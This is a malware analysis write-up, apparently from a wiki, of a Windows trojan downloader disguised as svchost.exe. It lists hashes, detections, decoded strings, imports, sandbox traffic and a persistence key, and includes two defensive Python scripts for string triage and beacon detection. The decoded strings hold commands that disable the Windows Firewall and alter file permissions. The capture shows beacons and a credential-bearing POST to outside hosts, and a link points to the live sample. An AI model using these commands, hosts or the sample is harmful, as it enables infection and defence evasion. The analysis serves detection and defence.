E88817fb6dd1b1340e29b73eed09a106

From aldeid

Description

Properties

  • This malware seems to be compiled with MinGW, a minimalist open-source development environment for Windows.
  • It is not packed, but it contains encoded strings (they appear to be base64 encoded).

Identification

File Name: svchost.exe
File Size: 73584 bytes
File Type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5:       e88817fb6dd1b1340e29b73eed09a106
SHA1:      285f2aac67b12716502e196345c0f39a970c58db
SHA256:    8ea6b5a35918ec19eeb904e42ddcd294ebfe6116b67f5940e25846ffbbd6fb3a
SHA512:    1d97636a99d64397ba2fc191e55e413d034ea06291b440d7d8ea043385011f456f3904c558ddc70e9233235758a354a37215755fdced6da16527112087ddaa08
CRC32:     08F89B9E
Ssdeep:    1536:0ubvVuG2m44f1SZZxGhjhigsWLNdh+K9FZ:txp2m44AZbGhjDn+8FZ

Antivirus detection

Antivirus             Detection                                       Update
AntiVir               TR/Downloader.Gen                               20140129
Avast                 Win32:Malware-gen                               20140129
DrWeb                 Trojan.DownLoader9.5410                         20140129
ESET-NOD32            a variant of Win32/TrojanDownloader.Agent.AAM   20140129
Fortinet              W32/Agent.AAM!tr                                20140129
Ikarus                Trojan.Win32.Malex                              20140129
Jiangmin              Trojan/Fsysna.jn                                20140129
Kaspersky             Trojan.Win32.Reconyc.hpf                        20140129
Malwarebytes          Trojan.Malex                                    20140129
Microsoft             Trojan:Win32/Malex.gen!E                        20140129
NANO-Antivirus        Trojan.Win32.Fsysna.cqxbss                      20140129
Norman                MadnessPro.A                                    20140129
Qihoo-360             HEUR/Malware.QVM01.Gen                          20140122
Sophos                Mal/Generic-S                                   20140129
Symantec              Suspicious.SillyFDC                             20140129
TrendMicro            PAK_Generic.001                                 20140129
TrendMicro-HouseCall  PAK_Generic.001                                 20140129
VBA32                 suspected of Trojan.Downloader.gen.h            20140128
AVG                   not detected                                    20140129
Ad-Aware              not detected                                    20140129
Agnitum               not detected                                    20140128
AhnLab-V3             not detected                                    20140128
Antiy-AVL             not detected                                    20140129
Baidu-International   not detected                                    20140129
BitDefender           not detected                                    20140129
Bkav                  not detected                                    20140125
ByteHero              not detected                                    20140121
CAT-QuickHeal         not detected                                    20140129
CMC                   not detected                                    20140122
ClamAV                not detected                                    20140129
Commtouch             not detected                                    20140129
Comodo                not detected                                    20140129
Emsisoft              not detected                                    20140129
F-Prot                not detected                                    20140129
F-Secure              not detected                                    20140129
GData                 not detected                                    20140129
K7AntiVirus           not detected                                    20140128
K7GW                  not detected                                    20140128
Kingsoft              not detected                                    20130829
McAfee                not detected                                    20140129
McAfee-GW-Edition     not detected                                    20140129
MicroWorld-eScan      not detected                                    20140129
Panda                 not detected                                    20140128
Rising                not detected                                    20140128
SUPERAntiSpyware      not detected                                    20140129
TheHacker             not detected                                    20140128
TotalDefense          not detected                                    20140129
VIPRE                 not detected                                    20140129
ViRobot               not detected                                    20140129
nProtect              not detected                                    20140129

Static analysis

Strings

The malware contains many strings:

YXBvS0FMaXBsaXM9*WVib2toaGh0*@R0*@[email protected]^ovLy8vLy9kZGRhYWFubm5nZ2*vb29ycnJkZGQuLi5ycnJ1*XUvLy93*3*[email protected]@[email protected]
YWI1Y2U2M^I4YTExMDRlN2YwOGRmYmI2NDFkYzliM^A=
Z^g0ZTI3ZmUyYzk3MDg0NTA5M2YwM^I4Mzh^ZmEwZGM=
NzA0ZDQxMzRmYTJ^MDhkMTc4NDFmND*hZmVkN2Y4OTk=
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
MS4xNg==
c3ZjaG9zdC5leGU=
TW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNS4xOyBlbi1VUzsgcnY6MS44LjAuNSkgR2Vja28vMjAwNjA3MzEgRmlyZWZveC8xLjUuMC41IEZsb2NrLzAuNy40LjE=
TW96aWxsYS81LjAgKFgxMTsgVTsgTGludXggMi40LjItMiBpNTg2OyBlbi1VUzsgbTE4KSBHZWNrby8yMDAxMDEzMSBOZXRzY2FwZTYvNi4wMQ==
TW96aWxsYS81LjAgKGNvbXBhdGlibGU7IE1TSUUgOC4wOyBXaW5kb3dzIE5UIDYuMjsgVHJpZGVudC80LjA7IFNMQ0MyOyAuTkVUIENMUiAyLjAuNTA3Mjc7IC5ORVQgQ0xSIDMuNS4zMDcyOTsgLk5FVCBDTFIgMy4wLjMwNzI5OyBNZWRpYSBDZW50ZXIgUEMgNi4wKQ==
TW96aWxsYS81LjAgKGNvbXBhdGlibGU7IE1TSUUgOS4wOyBXaW5kb3dzIE5UIDYuMjsgVHJpZGVudC80LjA7IFNMQ0MyOyAuTkVUIENMUiAyLjAuNTA3Mjc7IC5ORVQgQ0xSIDMuNS4zMDcyOTsgLk5FVCBDTFIgMy4wLjMwNzI5OyBNZWRpYSBDZW50ZXIgUEMgNi4wKQ==
TW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNS4xOyBlbi1VUzsgcnY6MC45LjYpIEdlY2tvLzIwMDExMTI4
TW96aWxsYS80LjAgKE1vYmlsZVBob25lIFNDUC01NTAwL1VTLzEuMCkgTmV0RnJvbnQvMy4wIE1NUC8yLjAgKGNvbXBhdGlibGU7IEdvb2dsZWJvdC8yLjE7IGh0dHA6Ly93d3cuZ29vZ2xlLmNvbS9ib3QuaHRtbCk=
TW96aWxsYS80LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNi4xOyBubDsgcnY6MS45LjIuMykgR2Vja28vMjAxMDA0MDEgRmlyZWZveC8zLjYuMw==
TW96aWxsYS80LjAgKFdpbmRvd3MgTlQgNS4xOyBVOyBlbikgUHJlc3RvLzIuNS4yMiBWZXJzaW9uLzEwLjUw
TW96aWxsYS80LjAgR2FsZW9uLzEuMi4wIChYMTE7IExpbnV4IGk2ODY7IFU7KSBHZWNrby8yMDAyMDMyNg==
T3BlcmEvMTAuODAgKFN1bk9TIDUuOCBzdW40dTsgVSkgT3BlcmEgMTAuOCBbZW5d
dWlkPQ==
dmVyPQ==
bWs9
b3M9
cnM9
Yz0=
cnE9
Y21kIC9jIGVjaG8gWXxDQUNMUyAi
IiAvUCAi
Ok4i
Q0FDTFMgIg==
OlIiIC9F
YWR2YXBpMzI=
Q2hlY2tUb2tlbk1lbWJlcnNoaXA=
 [8]
 [7]
regini 
U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cRXhwbG9yZXJcU2hlbGwgRm9sZGVycw==
AppData
cmd /c  "
Internet Explorer
ProgramFilesDir
SOFTWARE\Microsoft\Windows\CurrentVersion
\Internet Explorer\iexplore.exe 
U29mdHdhcmVcc3c=
path
R0g1Sy1HS0w4LUNQUDQtREUyNA==
urlmon
URLDownloadToFileA
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
POST
document.cookie=
["cookie","
"realauth=
"location"];
GET /
 HTTP/1.1
Host: 
User-Agent: 
Referer: 
Cookie: 
Cache-Control: no-cache
Connection: Keep-Alive
POST /
 HTTP/1.1 
Accept: */*
Content-Length: 
http://
Y2Zh
Y21k
ZXhl
d3Rm
ZGVm
ZGQx
ZGMx
ZHMx
ZGQy
ZGQz
ZGQ0
ZGQ1
ZGQ2
ZGQ3
Qzpc
U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25c
ProductName
V2luZG93cyA3
Win07
V2luZG93cyA4
Win08
V2luZG93cyA4LjE=
Win81
VmlzdGE=
Win_V
WFA=
WinXP
MjAwMA==
S2000
MjAwMw==
S2003
MjAwOA==
S2008
MjAxMw==
S2013
YWRt
ag==
SA==
ZA==
U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25ccG9saWNpZXNcRXhwbG9yZXJcUnVu
SEtFWV9MT0NBTF9NQUNISU5FXFNPRlRXQVJFXE1pY3Jvc29mdFxXaW5kb3dzXEN1cnJlbnRWZXJzaW9uXHBvbGljaWVzXEV4cGxvcmVyXFJ1bg==
U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu
SEtFWV9MT0NBTF9NQUNISU5FXFNvZnR3YXJlXE1pY3Jvc29mdFxXaW5kb3dzXEN1cnJlbnRWZXJzaW9uXFJ1bg==
SEtFWV9DVVJSRU5UX1VTRVJcU29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu
x86kernel2
bmV0IHN0b3AgTXBzU3Zj
c2MgY29uZmlnIE1wc1N2YyBzdGFydD0gZGlzYWJsZWQ=
Oio6RW5hYmxlZDo=
U1lTVEVNXENvbnRyb2xTZXQwMDFcc2VydmljZXNcU2hhcmVkQWNjZXNzXFBhcmFtZXRlcnNcRmlyZXdhbGxQb2xpY3lcU3RhbmRhcmRQcm9maWxlXEF1dGhvcml6ZWRBcHBsaWNhdGlvbnNcTGlzdA==
U1lTVEVNXENvbnRyb2xTZXQwMDJcc2VydmljZXNcU2hhcmVkQWNjZXNzXFBhcmFtZXRlcnNcRmlyZXdhbGxQb2xpY3lcU3RhbmRhcmRQcm9maWxlXEF1dGhvcml6ZWRBcHBsaWNhdGlvbnNcTGlzdA==
U1lTVEVNXENvbnRyb2xTZXQwMDNcc2VydmljZXNcU2hhcmVkQWNjZXNzXFBhcmFtZXRlcnNcRmlyZXdhbGxQb2xpY3lcU3RhbmRhcmRQcm9maWxlXEF1dGhvcml6ZWRBcHBsaWNhdGlvbnNcTGlzdA==
U1lTVEVNXEN1cnJlbnRDb250cm9sU2V0XFNlcnZpY2VzXFNoYXJlZEFjY2Vzc1xQYXJhbWV0ZXJzXEZpcmV3YWxsUG9saWN5XFN0YW5kYXJkUHJvZmlsZVxBdXRob3JpemVkQXBwbGljYXRpb25zXExpc3Q=
-LIBGCCW32-EH-2-SJLJ-GTHR-MINGW32
w32_sharedptr->size == sizeof(W32_EH_SHARED)
%s:%u: failed assertion `%s'
../../gcc/gcc/config/i386/w32-shared-ptr.c
GetAtomNameA (atom, s, sizeof(s)) != 0
AllocateAndInitializeSid
GetUserNameA
RegCloseKey
RegCreateKeyExA
RegOpenKeyA
RegQueryValueExA
RegSetValueExA
AddAtomA
CloseHandle
CopyFileA
CreateDirectoryA
CreateFileA
CreateMutexA
CreateProcessA
CreateThread
DeleteFileA
ExitProcess
FindAtomA
FreeLibrary
GetAtomNameA
GetFileAttributesA
GetLastError
GetModuleFileNameA
GetProcAddress
GetVolumeInformationA
LoadLibraryA
SetUnhandledExceptionFilter
Sleep
WaitForSingleObject
WinExec
WriteFile
lstrcatA
lstrlenA
_itoa
_strlwr
__getmainargs
__p__environ
__p__fmode
__set_app_type
_cexit
_iob
_onexit
_setmode
abort
atexit
atoi
exit
fflush
fprintf
free
malloc
memcpy
memset
rand
signal
sprintf
strcat
strcmp
strcpy
strlen
strncat
EnumWindows
GetWindowRect
GetWindowTextA
SetWindowPos
HttpOpenRequestA
HttpSendRequestA
InternetCloseHandle
InternetConnectA
InternetOpenA
InternetOpenUrlA
InternetReadFile
WSACleanup
WSAStartup
closesocket
connect
gethostbyname
htons
inet_addr
inet_ntoa
ioctlsocket
recv
send
sendto
socket
ADVAPI32.DLL
KERNEL32.dll
msvcrt.dll
msvcrt.dll
USER32.dll
WININET.DLL
WSOCK32.DLL

Some of them are base64 encoded. Once decoded, they yield the following additional content:

ÜapoKALiplis=ab5ce6704d4134fa2
1.16
svchost.exe
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.5) Gecko/20060731 Firefox/1.5.0.5 Flock/0.7.4.1
Mozilla/5.0 (X11; U; Linux 2.4.2-2 i586; en-US; m18) Gecko/20010131 Netscape6/6.01
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.2; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:0.9.6) Gecko/20011128
Mozilla/4.0 (MobilePhone SCP-5500/US/1.0) NetFront/3.0 MMP/2.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)
Mozilla/4.0 (Windows; U; Windows NT 6.1; nl; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
Mozilla/4.0 (Windows NT 5.1; U; en) Presto/2.5.22 Version/10.50
Mozilla/4.0 Galeon/1.2.0 (X11; Linux i686; U;) Gecko/20020326
Opera/10.80 (SunOS 5.8 sun4u; U) Opera 10.8 [en]
uid=
ver=
mk=
os=
rs=
c=
rq=
cmd /c echo Y|CACLS "
" /P "
:N"
CACLS "
:R" /E
advapi32
CheckTokenMembership
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Software\sw
GH5K-GKL8-CPP4-DE24
cmd
exe
wtf
def
dd1
dc1
ds1
dd2
dd3
dd4
dd5
dd6
dd7
C:\
SOFTWARE\Microsoft\Windows NT\CurrentVersion\
Windows 7
Windows 8
Windows 8.1
Vista
XP
2000
2003
2008
2013
adm
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
sc config MpsSvc start= disabled
:*:Enabled:
SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
SYSTEM\ControlSet003\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
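As an added example (not code from the original aldeid page), the following Python script performs the triage step described above: it picks strict base64 candidates out of a strings listing, decodes them, and keeps only those that yield printable text, so that API names and other alphabet-only words of a suitable length are not mistaken for encoded data. The sample input is a handful of strings taken from the dump above plus one constructed invalid candidate.

```python
import base64
import binascii
import re
import string

# Strict base64: alphabet characters only, length a multiple of 4, padding only at the end.
B64_RE = re.compile(r"^(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?$")
PRINTABLE = set(bytes(string.printable, "ascii"))


def decode_candidate(s, min_len=4):
    """Return the decoded text if s is strict base64 that decodes to printable ASCII, else None."""
    if len(s) < min_len or len(s) % 4 or not B64_RE.match(s):
        return None
    try:
        raw = base64.b64decode(s, validate=True)
    except (binascii.Error, ValueError):
        return None
    # Alphabet-only plaintext (e.g. "atoi") decodes to binary junk; drop anything non-printable.
    if not raw or any(b not in PRINTABLE for b in raw):
        return None
    return raw.decode("ascii")


def triage_strings(lines):
    """Map each strict-base64 string to its decoded text; plaintext and invalid strings are dropped."""
    found = {}
    for line in lines:
        s = line.strip()
        decoded = decode_candidate(s)
        if decoded is not None:
            found[s] = decoded
    return found


# Constructed sample: strings from the dump above plus one invalid candidate ('*' is not base64).
SAMPLE_STRINGS = [
    "c3ZjaG9zdC5leGU=",               # decodes to svchost.exe
    "MS4xNg==",                       # decodes to 1.16
    "bmV0IHN0b3AgTXBzU3Zj",           # decodes to net stop MpsSvc
    "Y21kIC9jIGVjaG8gWXxDQUNMUyAi",   # decodes to cmd /c echo Y|CACLS "
    "Oio6RW5hYmxlZDo=",               # decodes to :*:Enabled:
    "URLDownloadToFileA",             # plaintext import name, wrong length
    "GetLastError",                   # valid length, decodes to non-printable bytes
    "atoi",                           # same: valid length, non-printable result
    "YXBvS0FMaXBsaXM9*WVib2to",       # constructed: contains a character outside the alphabet
]

if __name__ == "__main__":
    for enc, dec in triage_strings(SAMPLE_STRINGS).items():
        print(f"{enc!r} -> {dec!r}")
```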

Imports

  • ADVAPI32.DLL
    • AllocateAndInitializeSid
    • GetUserNameA
    • RegCloseKey
    • RegCreateKeyExA
    • RegOpenKeyA
    • RegQueryValueExA
    • RegSetValueExA
  • KERNEL32.dll
    • AddAtomA
    • CloseHandle
    • CopyFileA
    • CreateDirectoryA
    • CreateFileA
    • CreateMutexA
    • CreateProcessA
    • CreateThread
    • DeleteFileA
    • ExitProcess
    • FindAtomA
    • FreeLibrary
    • GetAtomNameA
    • GetFileAttributesA
    • GetLastError
    • GetModuleFileNameA
    • GetProcAddress
    • GetVolumeInformationA
    • LoadLibraryA
    • SetUnhandledExceptionFilter
    • Sleep
    • WaitForSingleObject
    • WinExec
    • WriteFile
    • lstrcatA
    • lstrlenA
  • msvcrt.dll
    • _itoa
    • _strlwr
  • msvcrt.dll
    • __getmainargs
    • __p__environ
    • __p__fmode
    • __set_app_type
    • _cexit
    • _iob
    • _onexit
    • _setmode
    • abort
    • atexit
    • atoi
    • exit
    • fflush
    • fprintf
    • free
    • malloc
    • memcpy
    • memset
    • rand
    • signal
    • sprintf
    • strcat
    • strcmp
    • strcpy
    • strlen
    • strncat
  • USER32.dll
    • EnumWindows
    • GetWindowRect
    • GetWindowTextA
    • SetWindowPos
  • WININET.DLL
    • HttpOpenRequestA
    • HttpSendRequestA
    • InternetCloseHandle
    • InternetConnectA
    • InternetOpenA
    • InternetOpenUrlA
    • InternetReadFile
  • WSOCK32.DLL
    • WSACleanup
    • WSAStartup
    • closesocket
    • connect
    • gethostbyname
    • htons
    • inet_addr
    • inet_ntoa
    • ioctlsocket
    • recv
    • send
    • sendto
    • socket

Dynamic analysis

Network indicators

Contacted domains

  • dangord.ru (81.177.139.243)
  • study.mesi.ru (194.85.204.230)

Requests

GET /wOOl/mD/index.php?uid=01591718&ver=1.16&mk=1db015&os=WinXP&rs=adm&c=1&rq=0 HTTP/1.1
Host: dangord.ru
User-Agent: Mozilla/5.0 (X11; U; Linux 2.4.2-2 i586; en-US; m18) Gecko/20010131 Netscape6/6.01
Cache-Control: no-cache
Connection: Keep-Alive

POST /gst/default.aspx HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: study.mesi.ru
Content-Length: 44
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.2; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Cookie: {8279c7f1-b2ed-458e-805e-88494272c901}
Cache-Control: no-cache
Connection: Keep-Alive

login=studmskk_12_dsmihalin&password=u4jeD17
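As an added example that is not part of the original page, this Python snippet turns the check-in format documented above (the seven query parameters and the OS tags recovered from the decoded strings) into a proxy-log check. The log line format and the client addresses are constructed for the example; the first URL is the one captured above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Check-in parameter names and OS tags taken from the decoded strings of this sample.
BEACON_PARAMS = {"uid", "ver", "mk", "os", "rs", "c", "rq"}
OS_TAGS = {"Win07", "Win08", "Win81", "Win_V", "WinXP", "S2000", "S2003", "S2008", "S2013"}
VERSION_RE = re.compile(r"^\d+\.\d+$")


def parse_beacon(url):
    """Return the check-in parameters as a dict if url matches the beacon format, else None."""
    parts = urlsplit(url)
    if not parts.path.endswith("/index.php"):
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)
    # Exactly this parameter set, each given once; look-alikes with extra or missing keys fail.
    if set(qs) != BEACON_PARAMS or any(len(v) != 1 for v in qs.values()):
        return None
    flat = {k: v[0] for k, v in qs.items()}
    if flat["os"] not in OS_TAGS or not VERSION_RE.match(flat["ver"]):
        return None
    return flat


def find_beacons(log_lines):
    """Scan constructed 'client method url' proxy log lines; return (client, host, params) per hit."""
    hits = []
    for line in log_lines:
        fields = line.split()
        if len(fields) < 3 or fields[1] != "GET":
            continue
        params = parse_beacon(fields[2])
        if params is not None:
            hits.append((fields[0], urlsplit(fields[2]).hostname, params))
    return hits


# Constructed proxy log: one real beacon (URL from the sandbox capture above), two look-alikes.
SAMPLE_LOG = [
    "10.0.0.7 GET http://dangord.ru/wOOl/mD/index.php?uid=01591718&ver=1.16&mk=1db015&os=WinXP&rs=adm&c=1&rq=0",
    "10.0.0.8 GET http://example.com/index.php?uid=42&ver=1.16",                                   # wrong parameter set
    "10.0.0.9 GET http://example.com/stats.php?uid=1&ver=2.0&mk=a&os=WinXP&rs=adm&c=1&rq=0",      # wrong path
]

if __name__ == "__main__":
    for client, host, params in find_beacons(SAMPLE_LOG):
        print(client, "->", host, params)
```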

Process activity

  • svchost.exe
    • cmd.exe
      • cmd.exe
      • cacls.exe
    • CACLS.exe
    • cmd.exe
      • cmd.exe
      • cacls.exe
    • CACLS.exe
    • svchost.exe
      • regini.exe
      • regini.exe
      • regini.exe
      • regini.exe

Registry keys

The malware creates a persistence entry in the registry:

  • Key: HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run
  • Name: "x86kernel2"
  • Type: REG_SZ
  • Value: c:\users\username\appdata\roaming\03926344\svchost.exe

Links

Download sample (password: infected): https://www.dropbox.com/s/0do9lgywcz63d4d/e88817fb6dd1b1340e29b73eed09a106.zip
VirusTotal: https://www.virustotal.com/fr/file/8ea6b5a35918ec19eeb904e42ddcd294ebfe6116b67f5940e25846ffbbd6fb3a/analysis/
Malwr sandbox analysis: https://malwr.com/analysis/MTY2MGQzMTI3ZjhhNGJlZmJiZDc4N2FlZWUwMmY1OTc/
